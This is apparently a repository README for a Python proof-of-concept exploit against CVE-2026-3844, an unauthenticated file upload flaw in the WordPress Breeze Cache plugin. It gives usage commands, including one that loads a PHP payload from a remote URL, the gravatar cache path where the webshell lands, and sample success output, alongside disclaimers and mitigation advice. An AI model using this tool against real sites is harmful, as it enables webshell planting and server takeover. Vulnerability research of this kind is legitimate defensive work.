
Python proof-of-concept for CVE-2026-3844, an unauthenticated arbitrary file upload in WordPress Breeze Cache plugin, enabling remote code execution. Includes detection, exploitation, and webshell verification.
This repository contains a Python proof-of-concept (PoC) script for demonstrating an Unauthenticated Arbitrary File Upload vulnerability affecting the WordPress Breeze Cache plugin <= 2.4.4.
⚠️ This project is intended strictly for authorized security testing, educational research, and defensive validation purposes only.
The vulnerability abuses Breeze Cache gravatar caching functionality to store attacker-controlled files within the WordPress cache directory.
pycurltermcolorInstall dependencies:
pip install pycurl termcolor
| File | Description |
|---|---|
CVE-2026-3844.py | Main PoC exploit script |
CVE-2026-3844.yaml | YAML template/configuration |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
The script performs the following steps:
The uploaded payload may become accessible from:
/wp-content/cache/breeze-extra/gravatars/
Successful exploitation may depend on the following Breeze setting being enabled:
Host Files Locally - Gravatars
If the feature is disabled, exploitation attempts may fail.
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
This repository is provided for:
Do not use this project against systems you do not own or have explicit permission to test.
The author assumes no responsibility for misuse or damages caused by this project.
Website administrators should:
/wp-content/cache/ for suspicious filesThis proof-of-concept was created to help:
understand the security risks associated with insecure caching mechanisms and arbitrary file uploads.
Security Research / Educational Project